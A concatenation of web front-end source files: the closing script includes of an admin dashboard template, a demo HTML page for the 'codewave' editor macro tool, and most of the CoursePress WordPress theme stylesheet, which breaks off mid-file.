<script src="../../../../../common/theme/scripts/plugins/forms/pixelmatrix-uniform/jquery.uniform.min.js"></script>
<!-- MegaMenu -->
<script src="../../../../../common/theme/scripts/demo/megamenu.js?1382019475"></script>
<!-- Bootstrap Extended -->
<script src="../../../../../common/bootstrap/extend/bootstrap-select/bootstrap-select.js"></script>
<script src="../../../../../common/bootstrap/extend/bootstrap-switch/static/js/bootstrap-switch.js"></script>
<script src="../../../../../common/bootstrap/extend/jasny-fileupload/js/bootstrap-fileupload.js"></script>
<script src="../../../../../common/bootstrap/extend/bootbox.js"></script>
<script src="../../../../../common/bootstrap/extend/bootstrap-wysihtml5/js/wysihtml5-0.3.0_rc2.min.js"></script>
<script src="../../../../../common/bootstrap/extend/bootstrap-wysihtml5/js/bootstrap-wysihtml5-0.0.2.js"></script>
<!-- Google Code Prettify -->
<script src="../../../../../common/theme/scripts/plugins/other/google-code-prettify/prettify.js"></script>
<!-- Gritter Notifications Plugin -->
<script src="../../../../../common/theme/scripts/plugins/notifications/Gritter/js/jquery.gritter.min.js"></script>
<!-- Notyfy Notifications Plugin -->
<script src="../../../../../common/theme/scripts/plugins/notifications/notyfy/jquery.notyfy.js"></script>
<!-- MiniColors Plugin -->
<script src="../../../../../common/theme/scripts/plugins/color/jquery-miniColors/jquery.miniColors.js"></script>
<!-- DateTimePicker Plugin -->
<script src="../../../../../common/theme/scripts/plugins/forms/bootstrap-datetimepicker/js/bootstrap-datetimepicker.min.js"></script>
<!-- Cookie Plugin -->
<script src="../../../../../common/theme/scripts/plugins/system/jquery.cookie.js"></script>
<!-- Select2 Plugin -->
<script src="../../../../../common/theme/scripts/plugins/forms/select2/select2.js"></script>
<!-- Themer -->
<script src="../../../../../common/theme/scripts/demo/themer.js"></script>
<!-- Twitter Feed -->
<script src="../../../../../common/theme/scripts/demo/twitter.js"></script>
<!-- Easy-pie Plugin -->
<script src="../../../../../common/theme/scripts/plugins/charts/easy-pie/jquery.easy-pie-chart.js"></script>
<!-- Sparkline Charts Plugin -->
<script src="../../../../../common/theme/scripts/plugins/charts/sparkline/jquery.sparkline.min.js"></script>
<!-- Ba-Resize Plugin -->
<script src="../../../../../common/theme/scripts/plugins/other/jquery.ba-resize.js"></script>
<!-- Flot Charts Plugin -->
<script src="../../../../../common/theme/scripts/plugins/charts/flot/jquery.flot.js"></script>
<script src="../../../../../common/theme/scripts/plugins/charts/flot/jquery.flot.pie.js"></script>
<script src="../../../../../common/theme/scripts/plugins/charts/flot/jquery.flot.tooltip.js"></script>
<script src="../../../../../common/theme/scripts/plugins/charts/flot/jquery.flot.selection.js"></script>
<script src="../../../../../common/theme/scripts/plugins/charts/flot/jquery.flot.resize.js"></script>
<script src="../../../../../common/theme/scripts/plugins/charts/flot/jquery.flot.orderBars.js"></script>
<!-- Charts Helper Demo Script -->
<script src="../../../../../common/theme/scripts/demo/charts.helper.js?1382019475"></script>
<!-- Bootstrap Image Gallery -->
<script src="../../../../../common/theme/scripts/plugins/gallery/load-image/js/load-image.min.js"></script>
<script src="../../../../../common/bootstrap/extend/bootstrap-image-gallery/js/bootstrap-image-gallery.min.js" type="text/javascript"></script>
<!-- Dashboard Demo Script -->
<script src="../../../../../common/theme/scripts/demo/index.js?1382019475"></script>
<!-- Common Demo Script -->
<script src="../../../../../common/theme/scripts/demo/common.js?1382019475"></script>
</body>
</html> |
demo/index.html | kevthunder/codewave | <!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
<link rel="stylesheet" type="text/css" href="css/app.css" media="all" />
<script type="text/javascript" src="js/codewave.js"></script>
<script type="text/javascript" src="js/emmet-min.js"></script>
<script type="text/javascript">
document.addEventListener("DOMContentLoaded", function(){
window.cw = Codewave.detect('Editor');
});
</script>
</head>
<body>
<div class="test"></div>
<textarea name="" id="Editor" class="full" data-lang="js">
~~help~~
~~help:demo~~
~~help:editing~~
sdfasdfdsfasSed magna purus, fermentum eu, tincidunt eu, varius ~~hello~~, felis. Curabi~~box~~tur ullamcorper ultricies nisi.
~~box 20 5~~
~~box~~
This should be inside a box
~~box~~ ~~/box~~
and i can has many lines
nice ! ~~close~~
~~/box~~
~~wrapper_test~~
~~php:outer:c foo~~
~~testlong~~~~~
<!-- ~~testlong~~~~~ -->
<!-- ~~/testlong~~~~ -->
~~testparam test:test 1 2 test2:"with spaces\"and stuff"~~
~~edit hello~~
~~edit test~~
~~rename test test2~~
~~rename edit test2~~
~~javascript:f~~
~~box~~
~~f~~
~~if~~
~~log~~"~~hello~~"~~/log~~
~~/if~~
~~/f~~
~~/box~~
~~namespace~~
<?php
~~namespace~~
~~if~~
$lorem = 'ipsum';
~~/if~~
?>
~~namespace html~~
~~ul>li~~
</textarea>
</body>
</html> |
wp-content/plugins/coursepress/themes/coursepress/style.css | michael9999/bc-portal | /*
Theme Name: CoursePress
Theme URI: http://premium.wpmudev.org/
Author: WPMU DEV
Author URI: http://premium.wpmudev.org/
Description: Specialized theme for CoursePress
Version: 1.0
License: GNU General Public License
License URI: license.txt
Text Domain: coursepress
Domain Path: /languages/
Tags: course, courses, learning, teaching, training, e-learning, e-commerce
*/
/* =Reset
-------------------------------------------------------------- */
html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, font, ins, kbd, q, s, samp,
small, strike, strong, sub, sup, tt, var,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td {
border: 0;
font-family: inherit;
font-size: 100%;
font-style: inherit;
font-weight: inherit;
margin: 0;
outline: 0;
padding: 0;
vertical-align: baseline;
}
html {
font-size: 62.5%; /* Corrects text resizing oddly in IE6/7 when body font-size is set using em units http://clagnut.com/blog/348/#c790 */
overflow-y: scroll; /* Keeps page centered in all browsers regardless of content height */
-webkit-text-size-adjust: 100%; /* Prevents iOS text size adjust after orientation change, without disabling user zoom */
-ms-text-size-adjust: 100%; /* www.456bereastreet.com/archive/201012/controlling_text_size_in_safari_for_ios_without_disabling_user_zoom/ */
}
body {
background: #f9f9f9;
font-family: 'Lato', sans-serif;
font-size: 18px;
}
html, body{
height: 100%;
}
#page{
min-height: 100%;
height: auto !important;
height: 100%;
margin: 0 auto -100px;
}
footer {
height: 65px;
}
.push{
height: 100px;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
main,
nav,
section {
display: block;
}
ol, ul {
list-style: none;
}
table { /* tables still need 'cellspacing="0"' in the markup */
border-collapse: separate;
border-spacing: 0;
}
caption, th, td {
font-weight: normal;
text-align: left;
}
blockquote:before, blockquote:after,
q:before, q:after {
content: "";
}
blockquote, q {
quotes: "" "";
}
a:focus {
outline: thin dotted;
}
a:hover,
a:active { /* Improves readability when focused and also mouse hovered in all browsers people.opera.com/patrickl/experiments/keyboard/test */
outline: 0;
}
a img {
border: 0;
}
/* =Global
----------------------------------------------- */
body,
button,
input,
select,
textarea {
color: #404040;
font-family: sans-serif;
font-size: 16px;
font-size: 1.6rem;
line-height: 1.5;
}
/* Headings */
h1, h2, h3, h4, h5, h6 {
clear: both;
}
h1{
color:#878786;
font-size: 30px;
}
h2{
font-size: 26px;
}
h3{
font-weight: 300;
font-size: 24px;
}
hr {
background-color: #ccc;
border: 0;
height: 1px;
margin-bottom: 1.5em;
}
/* Text elements */
p {
margin-bottom: 1.5em;
}
ul, ol {
margin: 0 0 1.5em 3em;
}
ul {
list-style: disc;
}
ol {
list-style: decimal;
}
li > ul,
li > ol {
margin-bottom: 0;
margin-left: 1.5em;
}
.discussion-responses li > ul{
margin-left: 5.5em;
}
dt {
font-weight: bold;
}
dd {
margin: 0 1.5em 1.5em;
}
b, strong {
font-weight: bold;
}
dfn, cite, em, i {
font-style: italic;
}
blockquote {
margin: 15px;
}
address {
margin: 0 0 1.5em;
}
pre {
background: #eee;
font-family: "Courier 10 Pitch", Courier, monospace;
font-size: 15px;
font-size: 1.5rem;
line-height: 1.6;
margin-bottom: 1.6em;
max-width: 100%;
overflow: auto;
padding: 1.6em;
}
code, kbd, tt, var {
font: 15px Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
}
abbr, acronym {
border-bottom: 1px dotted #666;
cursor: help;
}
mark, ins {
background: #fff9c0;
text-decoration: none;
}
sup,
sub {
font-size: 75%;
height: 0;
line-height: 0;
position: relative;
vertical-align: baseline;
}
sup {
bottom: 1ex;
}
sub {
top: .5ex;
}
small {
font-size: 75%;
}
big {
font-size: 125%;
}
figure {
margin: 0;
}
table {
margin: 0 0 1.5em;
width: 100%;
}
th {
font-weight: bold;
}
img {
height: auto; /* Make sure images are scaled correctly. */
max-width: 100%; /* Adhere to container width. */
}
button,
input,
select,
textarea {
font-size: 100%; /* Corrects font size not being inherited in all browsers */
margin: 0; /* Addresses margins set differently in IE6/7, F3/4, S5, Chrome */
vertical-align: baseline; /* Improves appearance and consistency in all browsers */
*vertical-align: middle; /* Improves appearance and consistency in all browsers */
}
button,
input {
line-height: normal; /* Addresses FF3/4 setting line-height using !important in the UA stylesheet */
}
button,
input[type="button"],
input[type="reset"],
input[type="submit"] {
border: 1px solid #ccc;
border-color: #ccc #ccc #bbb #ccc;
border-radius: 3px;
background: #e6e6e6;
box-shadow: inset 0 1px 0 rgba( 255, 255, 255, 0.5 ), inset 0 15px 17px rgba( 255, 255, 255, 0.5 ), inset 0 -5px 12px rgba( 0, 0, 0, 0.05 );
color: rgba( 0, 0, 0, .8 );
cursor: pointer; /* Improves usability and consistency of cursor style between image-type 'input' and others */
-webkit-appearance: button; /* Corrects inability to style clickable 'input' types in iOS */
font-size: 12px;
font-size: 1.2rem;
line-height: 1;
padding: .6em 1em .4em;
text-shadow: 0 1px 0 rgba( 255, 255, 255, 0.8 );
}
button:hover,
input[type="button"]:hover,
input[type="reset"]:hover,
input[type="submit"]:hover {
//border-color: #ccc #bbb #aaa #bbb;
//box-shadow: inset 0 1px 0 rgba( 255, 255, 255, 0.8 ), inset 0 15px 17px rgba( 255, 255, 255, 0.8 ), inset 0 -5px 12px rgba( 0, 0, 0, 0.02 );
}
button:focus,
input[type="button"]:focus,
input[type="reset"]:focus,
input[type="submit"]:focus,
button:active,
input[type="button"]:active,
input[type="reset"]:active,
input[type="submit"]:active {
border-color: #aaa #bbb #bbb #bbb;
box-shadow: inset 0 -1px 0 rgba( 255, 255, 255, 0.5 ), inset 0 2px 5px rgba( 0, 0, 0, 0.15 );
}
input[type="checkbox"],
input[type="radio"] {
box-sizing: border-box; /* Addresses box sizing set to content-box in IE8/9 */
padding: 0; /* Addresses excess padding in IE8/9 */
}
input[type="search"] {
-webkit-appearance: textfield; /* Addresses appearance set to searchfield in S5, Chrome */
-webkit-box-sizing: content-box; /* Addresses box sizing set to border-box in S5, Chrome ( include -moz to future-proof ) */
-moz-box-sizing: content-box;
box-sizing: content-box;
}
input[type="search"]::-webkit-search-decoration { /* Corrects inner padding displayed oddly in S5, Chrome on OSX */
-webkit-appearance: none;
}
button::-moz-focus-inner,
input::-moz-focus-inner { /* Corrects inner padding and border displayed oddly in FF3/4 www.sitepen.com/blog/2008/05/14/the-devils-in-the-details-fixing-dojos-toolbar-buttons/ */
border: 0;
padding: 0;
}
input[type="text"],
input[type="email"],
input[type="url"],
input[type="password"],
input[type="search"],
textarea {
color: #666;
border: 1px solid #ccc;
border-radius: 0px;
}
input[type="text"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="password"]:focus,
input[type="search"]:focus,
textarea:focus {
color: #111;
}
input[type="text"],
input[type="email"],
input[type="url"],
input[type="password"],
input[type="search"]{
padding: 10px;
}
textarea {
overflow: auto; /* Removes default vertical scrollbar in IE6/7/8/9 */
padding-left: 3px;
vertical-align: top; /* Improves readability and alignment in all browsers */
width: 98%;
}
/* Links */
a {
color: #1cb8ea;
text-decoration: none;
}
a:visited {
color: #1cb8ea;
text-decoration: none;
}
a:hover,
a:focus,
a:active {
color: #1cb8ea;
text-decoration: underline;
}
/* Alignment */
.alignleft {
display: inline;
float: left;
margin-right: 1.5em;
}
.alignright {
display: inline;
float: right;
margin-left: 1.5em;
}
.aligncenter {
clear: both;
display: block;
margin: 0 auto;
}
/* Text meant only for screen readers */
.screen-reader-text {
clip: rect( 1px, 1px, 1px, 1px );
position: absolute !important;
}
.screen-reader-text:hover,
.screen-reader-text:active,
.screen-reader-text:focus {
background-color: #f1f1f1;
border-radius: 3px;
box-shadow: 0 0 2px 2px rgba( 0, 0, 0, 0.6 );
clip: auto !important;
color: #21759b;
display: block;
font-size: 14px;
font-weight: bold;
height: auto;
left: 5px;
line-height: normal;
padding: 15px 23px 14px;
text-decoration: none;
top: 5px;
width: auto;
z-index: 100000; /* Above WP toolbar */
}
/* Clearing */
.clear:before,
.clear:after,
.entry-content:before,
.entry-content:after,
.comment-content:before,
.comment-content:after,
.site-header:before,
.site-header:after,
.site-content:before,
.site-content:after,
.site-footer:before,
.site-footer:after {
content: '';
display: table;
}
.clear:after,
.entry-content:after,
.comment-content:after,
.site-header:after,
.site-content:after,
.site-footer:after {
clear: both;
}
/* =Menu
----------------------------------------------- */
body{
font-family: 'Lato', sans-serif;
font-weight: 300;
color: #878786;
}
p{
font-size: 18px;
color: #666666;
}
blockquote p{
color: #1b94b5;
font-weight: 300;
padding: 20px 15px 20px 15px;
border-top: 2px solid #c9ced2;
border-bottom: 2px solid #c9ced2;
text-align: left;
line-height: 30px;
font-size: 20px;
}
/*
blockquote p:before{
content: "“";
font-size: 40px;
line-height: 18px;
}
blockquote p:after{
content: "„";
font-size: 40px;
margin-left: 5px;
}*/
.main-navigation {
float: right;
text-align: right;
width: 75%;
color: #666666;
font-size: 18px;
font-family: 'Lato', sans-serif;
margin-top: 10px;
}
.site-branding{
float: left;
text-align: left;
width: 25%;
}
h1.site-title a{
color: #878786;
}
h1.site-title a:hover{
text-decoration: none;
}
.footer-navigation ul {
list-style: none;
width: auto;
text-align: center;
display: inline-block;
float: none;
}
.footer-navigation li {
float: left;
width: auto;
text-align: center;
display: inline-block;
margin: 0 1px;
}
.footer-navigation a {
display: block;
text-decoration: none;
color: #83abb6;
line-height: 24px;
font-size: 14px;
float: left;
padding: 0px 10px 0px 10px;
font-weight: 400;
}
.footer-navigation a:hover {
color: #74d1d4;
}
.menu-footer-menu-container{
display: block;
}
.main-navigation ul {
list-style: none;
margin: 0;
padding-left: 0;
float: right;
text-align: right;
}
.main-navigation li {
float: left;
position: relative;
margin-left: 30px;
}
.main-navigation a {
display: block;
text-decoration: none;
color: #666666;
line-height: 18px;
}
.main-navigation a:hover {
color: #74d1d4;
}
.main-navigation .menu-item-cp-courses{
background:url( 'images/menu-icon-search.png' );
background-repeat: no-repeat;
background-position: left bottom;
padding-left: 30px;
}
.main-navigation .menu-item-cp-dashboard{
background:url( 'images/menu-icon-dashboard.png' );
background-repeat: no-repeat;
background-position: left bottom;
padding-left: 30px;
}
.main-navigation .menu-item-cp-logout{
background:url( 'images/menu-icon-profile.png' );
background-repeat: no-repeat;
background-position: left bottom;
padding-left: 26px;
}
.main-navigation ul ul {
display: none;
float: left;
text-align: left;
left: 0;
position: absolute;
top: 20px;
z-index: 99999;
padding-top: 26px;
}
.main-navigation ul ul ul {
left: 100%;
top: 0;
}
.main-navigation ul ul a {
background: none repeat scroll 0% 0% #f5f5f5;
border-bottom: 1px solid #c9ced2;
border-left: 1px solid #c9ced2;
border-right: 1px solid #c9ced2;
border-top: 1px solid #c9ced2;
display: block;
line-height: 22px;
padding: 10px;
width: auto;
min-width: 150px;
max-width: 200px;
white-space: normal;
font-size: 16px;
}
.main-navigation ul.sub-menu ul{
margin-left:0px;
padding-top: 0px;
margin-top: 0px;
}
.sub-menu li + ul{
background-color: red;
}
.main-navigation ul.sub-menu li{
margin-left:0px;
padding-top: 0px;
margin-top: -1px;
}
.main-navigation ul ul a:hover {
background: #f8f8f8;
}
.main-navigation ul ul li {
}
.main-navigation li:hover > a {
}
.main-navigation ul ul :hover > a {
}
.main-navigation ul ul a:hover {
}
.main-navigation ul li:hover > ul {
display: block;
}
.main-navigation .current_page_item a,
.main-navigation .current-menu-item a {
}
/* Small menu */
.menu-toggle {
cursor: pointer;
display: none;
}
/* =Content
----------------------------------------------- */
.sticky {
}
.hentry {
margin: 0 0 1.5em;
}
.byline,
.updated {
display: none;
}
.single .byline,
.group-blog .byline {
display: inline;
}
.page-content,
.entry-content,
.entry-summary {
margin: 10px 0 0;
}
.page-links {
clear: both;
margin: 0 0 1.5em;
}
/* =Asides
----------------------------------------------- */
.blog .format-aside .entry-title,
.archive .format-aside .entry-title {
display: none;
}
/* =Media
----------------------------------------------- */
.page-content img.wp-smiley,
.entry-content img.wp-smiley,
.comment-content img.wp-smiley {
border: none;
margin-bottom: 0;
margin-top: 0;
padding: 0;
}
.wp-caption {
border: 1px solid #ccc;
margin-bottom: 1.5em;
max-width: 100%;
}
.wp-caption img[class*="wp-image-"] {
display: block;
margin: 1.2% auto 0;
max-width: 98%;
}
.wp-caption-text {
text-align: center;
}
.wp-caption .wp-caption-text {
margin: 0.8075em 0;
}
.site-main .gallery {
margin-bottom: 1.5em;
}
.gallery-caption {
}
.site-main .gallery a img {
border: none;
height: auto;
max-width: 90%;
}
.site-main .gallery dd {
margin: 0;
}
.site-main .gallery-columns-4 .gallery-item {
}
.site-main .gallery-columns-4 .gallery-item img {
}
/* Make sure embeds and iframes fit their containers */
embed,
iframe,
object {
/*max-width: 100%;*/
}
/* =Navigation
----------------------------------------------- */
.site-main [class*="navigation"] {
margin: 20px 0 1.5em;
overflow: hidden;
}
.site-main [class*="navigation"] ul {
margin: 0 0 0.2em 0em;
display: inline-block;
}
[class*="navigation"] .nav-previous {
float: left;
width: 50%;
}
[class*="navigation"] .nav-next {
float: right;
text-align: right;
width: 50%;
}
/* =Comments
----------------------------------------------- */
.comment-content a {
word-wrap: break-word;
}
.bypostauthor {
}
/* =Widgets
----------------------------------------------- */
.widget {
margin: 0 0 1.5em;
}
/* Make sure select elements fit in widgets */
.widget select {
max-width: 100%;
}
/* Search widget */
.widget_search .search-submit {
display: none;
}
/* =Infinite Scroll
----------------------------------------------- */
/* Globally hidden elements when Infinite Scroll is supported and in use. */
.infinite-scroll .paging-navigation, /* Older / Newer Posts Navigation ( always hidden ) */
.infinite-scroll.neverending .site-footer { /* Theme Footer ( when set to scrolling ) */
display: none;
}
/* When Infinite Scroll has reached its end we need to re-display elements that were hidden ( via .neverending ) before */
.infinity-end.neverending .site-footer {
display: block;
}
/* =Other
----------------------------------------------- */
.wrap-full{
width: 100%;
}
.wrap, .site-content{
width: 960px;
margin-left: auto;
margin-right: auto;
position: relative;
}
.site-content{
padding-top: 40px;
padding-bottom: 40px;
}
.site-header{
border-bottom: 1px solid #c9ced2;
padding: 50px 0px 10px 0px;
}
.site-footer{
background: #f2f6f8;
border-top: 1px #5dd5fb solid;
padding-top: 25px;
padding-bottom: 10px;
}
.content-side-area{
width: 700px;
float: left;
}
/* WIDGETS */
#third.widget-area{
width: 100%;
}
#third.widget-area .widget{
width: 32%;
float: left;
margin-right: 1%;
}
#third.widget-area .widget:nth-child( 3n + 1 ) {
clear: both;
}
#secondary.widget-area{
float: right;
width: 235px;
}
.widget-area ol, ul{
list-style: none;
margin-left: 0px;
}
.widget-area .tagcloud a{
font-size: 18px !important;
}
.textwidget{
line-height: 30px;
}
h1.widget-title{
font-size: 26px;
}
.widget-area .widget_rss img{
display: none;
}
h1.widget-title span.yellow{
color: #c0c21e;
}
a.rsswidget{
color: #878786
}
/* COURSES ARCHIVE */
.post-type-archive-course article.type-course{
background-color: #f3f3f3;
width: 100%;
float: left;
height: 225px;
text-overflow: ellipsis;
position: relative;
}
.post-type-archive-course article.type-course .entry-content, .post-type-archive-course article.type-course .entry-content p{
font-size: 16px;
color: #878786;
}
.post-type-archive-course article.type-course .entry-content p{
height: 72px;
overflow: hidden;
}
.post-type-archive-course article.type-course h1, .post-type-archive-course article.type-course h1 a, .post-type-archive-course article.type-course .entry-title a{
font-size: 26px;
color: #878786;
text-decoration: none;
width: 400px;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
.post-type-archive-course article.type-course figure{
position: relative;
width: 235px;
height: 225px;
overflow: hidden;
border-right: 2px solid #dce163;
float: left;
}
.post-type-archive-course article.type-course figcaption{
position: absolute;
color: #fff;
font-size: 14px;
text-align: center;
background-color: #23bee9;
margin-left: 10%;
padding: 4px 0px 4px 0px;
width: 80%;
text-transform: uppercase;
/* text-transform: capitalize;*/
font-weight: 400;
float: left;
}
.post-type-archive-course article.type-course .edit-link{
position: absolute;
bottom: 0;
right: 0;
background-color: #fff;
color: #88e2ff;
padding: 3px 10px 3px 10px;
font-size: 12px;
}
.post-type-archive-course section.article-content-right{
float: left;
margin-left: 30px;
width: 400px;
margin-top: 15px;
}
.post-type-archive-course section.article-content-right.quick-course-info-extended{
width: 100%;
}
.post-type-archive-course section.article-content-right .entry-content{
overflow: hidden;
height: 110px;
}
.instructors-content{
color: #c0c21e;
font-size: 16px;
padding-bottom: 10px;
}
.post-type-archive-course .instructors-content{
color: #1cb8ea;
font-size: 16px;
padding-bottom: 10px;
}
.type-course .instructors-content, .instructors-content a, a.course-name-content,
.type-course .instructors-content, .instructors-content a:visited, a.course-name-content:visited{
color: #c0c21e;
font-size: 16px;
padding-bottom: 10px;
}
.post-type-archive-course .quick-course-info{
position: absolute;
bottom: 0;
width: 433px;
height: 45px;
border-top: 1px solid #e6e6e3;
float: right;
}
.post-type-archive-course .quick-course-info-extended{
width: 95.6%;
}
.w100{
width: 95.5%;
}
.post-type-archive-course .quick-course-info .course-time{
width: 25%;
float: left;
font-size: 12px;
font-weight: 400;
color: #828282;
background-image: url( "images/time-icon.png" );
background-repeat: no-repeat;
padding-left: 20px;
margin-top: 13px;
display: block;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
.post-type-archive-course .quick-course-info .course-lang{
width: 18%;
float: left;
font-size: 12px;
font-weight: 400;
color: #828282;
background-image: url( "images/language-icon.png" );
background-repeat: no-repeat;
padding-left: 20px;
margin-top: 13px;
display: block;
margin-left: 2%;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
.post-type-archive-course .quick-course-info .go-to-course-button{
width: 44%;
float: right;
display: block;
background-color: #0facd9;
color: #fff;
text-align: center;
padding: 6px 0 6px 0px;
font-family: 'Dosis', sans-serif;
font-size: 22px;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
max-width: 180px;
}
.post-type-archive-course article.type-course:hover,
.post-type-archive-course article.type-course:hover h1 a,
.post-type-archive-course article.type-course:hover .entry-title a,
.post-type-archive-course article.type-course:hover .entry-content p,
.post-type-archive-course article.type-course:hover .course-time,
.post-type-archive-course article.type-course:hover .course-lang{
/*background-color: #88e2ff;
color:#fff !important;*/
}
.post-type-archive-course article.type-course:hover .instructors-content, .post-type-archive-course article.type-course:hover .instructors-content a{
/*color:#d7fdff;*/
}
.post-type-archive-course article.type-course:hover .quick-course-info .go-to-course-button,
.post-type-archive-course article.type-course:hover .quick-course-info button.apply-button-enrolled
{
background-color: #23bee9;
text-decoration: underline;
}
.post-type-archive-course article.type-course:hover .course-time{
//background-image: url( "images/time-icon-white.png" );
}
.post-type-archive-course article.type-course:hover .course-lang{
//background-image: url( "images/language-icon-white.png" );
}
.post-type-archive-course article.type-course:hover figure{
//border-right: 2px solid #23bee9;
}
.post-type-archive-course article.type-course:hover .quick-course-info{
//border-top: 1px solid #23bee9;
}
/* Numeric pagination */
#navigation-pagination.navigation{
text-align: right;
margin-top: 1px;
}
#navigation-pagination.navigation li a,
#navigation-pagination.navigation li a:hover,
#navigation-pagination.navigation li.active a,
#navigation-pagination.navigation li.disabled {
color: #fff;
text-decoration:none;
}
#navigation-pagination.navigation li {
display: inline;
}
#navigation-pagination.navigation li a,
#navigation-pagination.navigation li a:hover,
#navigation-pagination.navigation li.active a,
#navigation-pagination.navigation li.disabled {
background-color: #fff;
cursor: pointer;
padding: 1px 16px 4px 16px;
font-family: 'Dosis', sans-serif;
font-size: 22px;
color: #0facd8;
}
#navigation-pagination.navigation li.active a {
background-color: #0facd8;
color: #fff;
}
#navigation-pagination.navigation li a, #navigation-pagination.navigation li a:hover, #navigation-pagination.navigation li.active a, #navigation-pagination.navigation li.disabled{
border: 1px solid #0facd8;
}
/* COURSE OVERVIEW */
#course-summary{
margin-top: 15px;
clear:both;
}
.course-video{
width: 52%;
min-height: 281px;
border: 1px solid #ccc;
display: block;
float: left;
margin-right: 2%;
overflow: hidden;
position: relative;
}
.course-featured-media iframe,
.course-featured-media object,
.course-featured-media embed,
.course-featured-media .wp-video-shortcode,
.course-featured-media .mejs-layer,
.course-featured-media .mejs-container
{
position: relative;
top: 0;
left: 0;
width: 100%;
height: 100%;
}
.course-featured-media .video_player .wp-video{
max-width: 100%;
height: inherit;
}
.course-video iframe,
.course-video object,
.course-video embed,
.course-video .wp-video-shortcode,
.course-video .mejs-layer,
.course-video .mejs-container
{
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
}
.course-video .video_player .wp-video{
max-width: 100%;
height: inherit;
}
.entry-content-excerpt{
float: right;
width: 45%;
min-height: 283px;
position: relative;
max-height: 195px;
overflow: hidden;
text-overflow: ellipsis;
}
.entry-content-excerpt-right{
float: left;
width: 100%;
}
.entry-content-excerpt p{
max-height: 195px;
overflow: hidden;
text-overflow: ellipsis;
}
.entry-content-excerpt .quick-course-info{
border-top: 2px solid #dadc23;
padding-top: 20px;
float: left;
width: 100%;
position: absolute;
bottom:0;
}
.single-course .course-time{
width: 40%;
float: left;
font-size: 12px;
font-weight: 400;
color: #828282;
background-image: url( "images/time-icon.png" );
background-repeat: no-repeat;
padding-left: 20px;
display: block;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
.single-course .course-lang{
width: 40%;
float: left;
font-size: 12px;
font-weight: 400;
color: #828282;
background-image: url( "images/language-icon.png" );
background-repeat: no-repeat;
padding-left: 20px;
display: block;
margin-left: 2%;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
/* SPAN COURSE STATUS INDICATION BUTTONS */
.apply-button-finished,
.apply-button-full,
.apply-button-enrollment-closed,
.apply-button-enrollment-finished,
.apply-button-prerequisite,
.apply-button-not-started,
.apply-button-pending,
.apply-button,
a.apply-button-enrolled,
.manage-course,
#student-settings input[type="submit"].apply-button-enrolled,
#modules_form input[type="submit"].apply-button-enrolled,
#contact_form input[type="submit"].apply-button-enrolled,
.apply-box input[type="submit"].apply-button,
.apply-box a.apply-button{
min-width: 240px;
display: block;
background-color: #ccc;
background: #ccc;
color: #fff;
text-align: center;
padding: 6px 30px 6px 30px;
font-family: 'Dosis', sans-serif;
font-size: 22px;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
margin-top: 1px;
-moz-border-radius: 0px;
-webkit-border-radius: 0px;
border-radius: 0px;
border: none;
text-shadow: none;
font-weight: 300;
box-shadow: none;
}
.apply-button-enrolled
{
min-width: 240px;
max-width: 240px;
display: block;
background-color: #ccc;
background: #ccc;
color: #fff;
text-align: center;
padding: 6px 30px 6px 30px;
font-family: 'Dosis', sans-serif;
font-size: 22px;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
margin-top: 1px;
-moz-border-radius: 0px;
-webkit-border-radius: 0px;
border-radius: 0px;
border: none;
text-shadow: none;
font-weight: 300;
box-shadow: none;
}
.quick-course-info .apply-button-enrolled{
min-width: 120px;
max-width: 120px;
}
.single-course .quick-course-info .apply-button-enrolled{
padding-left: 20px;
padding-right: 20px;
min-width: 240px;
max-width: 240px;
}
.course-archive .apply-button-finished,
.course-archive .apply-button-full,
.course-archive .apply-button-enrollment-closed,
.course-archive .apply-button-enrollment-finished,
.course-archive .apply-button-prerequisite,
.course-archive .apply-button-not-started,
.course-archive .apply-button-pending,
.course-archive .apply-button,
.course-archive .apply-button-enrolled,
.course-archive a.apply-button-enrolled,
.course-archive #student-settings input[type="submit"].apply-button-enrolled,
.course-archive #modules_form input[type="submit"].apply-button-enrolled,
.course-archive #contact_form input[type="submit"].apply-button-enrolled,
.course-archive .apply-box input[type="submit"].apply-button,
.course-archive .apply-box a.apply-button,
{
margin-top: 0px;
min-width: 0px;
padding: 6px 24px 6px 24px;
}
.course-archive button.apply-button-enrolled,
.content-instructor-profile button.apply-button-enrolled{
padding: 11px 24px 11px 24px;
}
.apply-button-not-started,
.apply-button-pending,
.apply-button-enrolled,
a.apply-button-enrolled,
.manage-course{
background-color: #ff6600;
background: #ff6600;
}
.apply-button,
.apply-button-enrolled,
.apply-button-not-started,
a.apply-button-enrolled,
#student-settings input[type="submit"].apply-button-enrolled,
#modules_form input[type="submit"].apply-button-enrolled,
#contact_form input[type="submit"].apply-button-enrolled,
.apply-box input[type="submit"].apply-button,
.apply-box a.apply-button{
background-color: #0facd9;
background: #0facd9;
}
a.apply-button-enrolled:hover, #student-settings input[type="submit"].apply-button-enrolled:hover, #modules_form input[type="submit"].apply-button-enrolled:hover, #contact_form input[type="submit"].apply-button-enrolled:hover, .apply-box input[type="submit"].apply-button:hover{
background-color: #21bce8;
}
.save_elements_message_ok{
background-color: #21bce8;
}
#student-settings input[type="submit"]{
width: 20%;
}
.course_structure_page_li.single_column a:hover, .course_structure_unit_label.single_column a:hover {
background:none;
}
/* ==================================== */
/* green button */
